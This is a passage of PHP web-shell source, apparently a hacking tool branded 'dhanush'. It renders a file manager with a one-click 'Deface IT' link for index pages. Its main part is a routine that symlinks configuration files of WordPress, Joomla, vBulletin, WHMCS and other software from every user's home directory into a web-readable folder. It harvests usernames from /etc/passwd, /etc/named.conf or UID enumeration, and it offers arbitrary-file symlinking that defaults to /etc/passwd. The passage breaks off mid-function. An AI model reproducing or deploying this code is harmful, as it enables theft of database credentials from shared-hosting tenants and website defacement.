1033 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1034 <?php if($os != 'Windows')
1035 {
1036 echo "<td align=center><font size=2>";
1037 echo getOGid($val)."</font></td>";
1038 } ?>
1039 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1040 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1041 <td></td>
1042 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1043 </tr></font>
1044 <?php
1045 }
1046 else if(is_file($vv))
1047 {
1048 ?>
1049 <tr style="background-color:#0C0C0C;" onMouseOver="style.backgroundColor='#000000'" onMouseOut="style.backgroundColor='#0C0C0C'">
1050 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
1051
1052 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
1053
1054 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
1055
1056 <?php if($os != 'Windows')
1057 {
1058 echo "<td align=center><font size=2>";
1059 echo getOGid($val)."</font></td>";
1060 } ?>
1061 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
1062
1063 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
1064 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
1065 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
1066 </tr>
1067 <p>
1068 <?php
1069 }
1070 }
1071
1072 echo "</table>
1073<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
1074<select class=sbox name=choice style='width: 100px;'>
1075 <option value=delete>Delete</option>
1076 <option value=chmod>Change mode</option>
1077 if(class_exists('ZipArchive'))
1078 { <option value=compre>Compress</option>
1079 <option value=uncompre>Uncompress</option> }
1080 </select>
1081
1082 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
1083 }}
1084 else
1085 {
1086 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
1087 }
1088
1089}
1090if(isset($_REQUEST["script"]))
1091{
1092 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
1093 ?>
1094 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('manuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
1095 <td><a href=javascript:void(0) onClick="getdata('scriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
1096 </tr></table></center>
1097 <?php
1098}
1099else if(isset($_REQUEST['manuallyscript']))
1100{
1101 ?>
1102 <center>
1103 <form action="<?php echo $self; ?>" method="post">
1104 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
1105 <input type="button" OnClick="manuallyscriptfn(passwd.value)" value="Get Config" class="but">
1106 </form>
1107 </center>
1108 <?php
1109}
1110else if(isset($_REQUEST['scriptlocator']))
1111{
1112 if(stristr(php_uname(),"Linux"))
1113 {
1114 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
1115 $path=explode('/',$url);
1116 $url =str_replace($path[count($path)-1],'',$url);
1117 function syml($usern,$pdomain)
1118 {
1119 symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1120 symlink('/home/'.$usern.'/public_html/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1121 symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1122 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1123 symlink('/home/'.$usern.'/public_html/vb/core/includes/config.php',$pdomain.'~~vBulletin5.txt');
1124 symlink('/home/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1125 symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1126 symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1127 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb1.txt');
1128 symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1129 symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1130 symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1131 symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1132 symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1133 symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1134 symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1135 symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1136 symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1137 symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1138 symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1139 symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1140 symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1141 symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1142 symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1143 symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1144 symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1145 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1146 symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1147 symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1148 symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1149 symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1150 symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1151 symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1152 symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1153 symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1154 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1155 symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1156 symlink('/home2/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1157 symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1158 symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1159 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb2.txt');
1160 symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1161 symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1162 symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1163 symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1164 symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1165 symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1166 symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1167 symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1168 symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1169 symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1170 symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1171 symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1172 symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1173 symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1174 symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1175 symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1176 symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1177 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1178 symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1179 symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1180 symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1181 symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1182 symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1183 symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1184 symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1185 symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1186 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1187 symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1188 symlink('/home3/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1189 symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1190 symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1191 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb3.txt');
1192 symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1193 symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1194 symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1195 symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1196 symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1197 symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1198 symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1199 symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1200 symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1201 symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1202 symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1203 symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1204 symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1205 symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1206 symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1207 symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1208 symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1209 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1210 symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1211 symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1212 symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1213 symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1214 symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1215 symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1216 symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1217 symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1218 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1219 symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1220 symlink('/home4/'.$usern.'/public_html/inc/config.php',$pdomain.'~~mybb.txt');
1221 symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1222 symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1223 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb4.txt');
1224 symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1225 symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1226 symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1227 symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1228 symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1229 symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1230 symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1231 symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1232 symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1233 symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1234 symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1235 symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1236 symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1237 symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1238 symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1239 symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1240 symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1241 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1242 symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1243 symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1244 symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1245 symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1246 symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1247 symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1248 symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1249 symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1250 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1251 symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1252 symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1253 symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1254 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb5.txt');
1255 symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1256 symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1257 symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1258 symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1259 symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1260 symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1261 symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1262 symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1263 symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1264 symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1265 symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1266 symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1267 symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1268 symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1269 symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1270 symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1271 symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1272 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1273 symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1274 symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1275 symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1276 symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1277 symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1278 symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1279 symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1280 symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1281 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1282 symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1283 symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1284 symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1285 symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1286 symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1287 symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1288 symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1289 symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1290 symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1291 symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1292 symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1293 symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1294 symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1295 symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1296 symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1297 symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1298 symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1299 symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1300 symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1301 symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1302 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1303 symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1304 symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1305 symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1306 symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1307 symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1308 symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1309 symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
1310 symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
1311 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
1312 symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
1313 symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
1314 symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
1315 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~ipb7.txt');
1316 symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
1317 symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
1318 symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
1319 symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
1320 symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
1321 symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
1322 symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
1323 symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
1324 symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
1325 symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
1326 symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
1327 symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
1328 symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
1329 symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
1330 symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
1331 symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
1332 symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
1333 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
1334 symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
1335 symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
1336 symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
1337 symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
1338 symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
1339 symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
1340 }
1341 if(isset($_REQUEST['passwd']))
1342 {
1343 $getetc = trim($_REQUEST['passwd']);
1344
1345 mkdir("dhanushSPT");
1346 chdir("dhanushSPT");
1347
1348 $myfile = fopen("test.txt","w");
1349 fputs($myfile,$getetc);
1350 fclose($myfile);
1351
1352 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1353 while(!feof($file))
1354 {
1355 $s = fgets($file);
1356 $matches = array();
1357 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1358 $matches = str_replace("home/","",$matches[1]);
1359 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1360 continue;
1361 syml($matches,$matches);
1362 }
1363 fclose($file);
1364 unlink("test.txt");
1365 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1366 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1367
1368 }
1369 else
1370 {
1371 $d0mains = @file("/etc/named.conf");
1372 if($d0mains)
1373 {
1374 mkdir("dhanushST");
1375 chdir("dhanushST");
1376
1377 foreach($d0mains as $d0main)
1378 {
1379 if(eregi("zone",$d0main))
1380 {
1381 preg_match_all('#zone "(.*)"#', $d0main, $domains);
1382 flush();
1383
1384 if(strlen(trim($domains[1][0])) > 2)
1385 {
1386 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
1387
1388 syml($user['name'],$domains[1][0]);
1389 }
1390 }
1391 }
1392 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1393 echo "<br><center><a href=".$url."dhanushST target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1394 }
1395 else
1396 {
1397 mkdir("dhanushSPT");
1398 chdir("dhanushSPT");
1399 $temp = "";
1400 $val1 = 0;
1401 $val2 = 1000;
1402 for(;$val1 <= $val2;$val1++)
1403 {
1404 $uid = @posix_getpwuid($val1);
1405 if ($uid)
1406 $temp .= join(':',$uid)."\n";
1407 }
1408 echo '<br/>';
1409 $temp = trim($temp);
1410
1411 $file5 = fopen("test.txt","w");
1412 fputs($file5,$temp);
1413 fclose($file5);
1414
1415
1416 $file = fopen("test.txt", "r") or exit("Unable to open file!");
1417 while(!feof($file))
1418 {
1419 $s = fgets($file);
1420 $matches = array();
1421 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
1422 $matches = str_replace("home/","",$matches[1]);
1423 if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
1424 continue;
1425 syml($matches,$matches);
1426 }
1427 fclose($file);
1428 echo "</table>";
1429 unlink("test.txt");
1430 echo "<center><font class=txt size=3>[ Done ]</font></center>";
1431 echo "<br><center><a href=".$url."dhanushSPT target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
1432 }
1433 }
1434 }
1435 else
1436 echo "<center>Cannot Complete the task!!!!</center>";
1437
1438}
1439else if(isset($_GET["symlinkfile"]))
1440{
1441 if(!isset($_GET['file']))
1442 {
1443 ?>
1444 <center>
1445 <form onSubmit="getdata('symlinkmyfile',file.value);return false;">
1446 <input type="text" class="box" name="file" size="50" value="/etc/passwd">
1447 <input type="button" value="Create Symlink" onClick="getdata('symlinkmyfile',file.value)" class="but">
1448 </form></center>
1449 <br><br>
1450 <?php
1451 }
1452}
1453
1454else if(isset($_GET['symlinkmyfile']))
1455{
1456 if(stristr(php_uname(),"Linux"))
1457 {
1458 $fakedir="cx";
1459 $fakedep=16;
1460
1461 $num=0; // offset of symlink.$num
1462
1463 if(!empty($_GET['myfile']))
1464 $file=$_GET['myfile'];
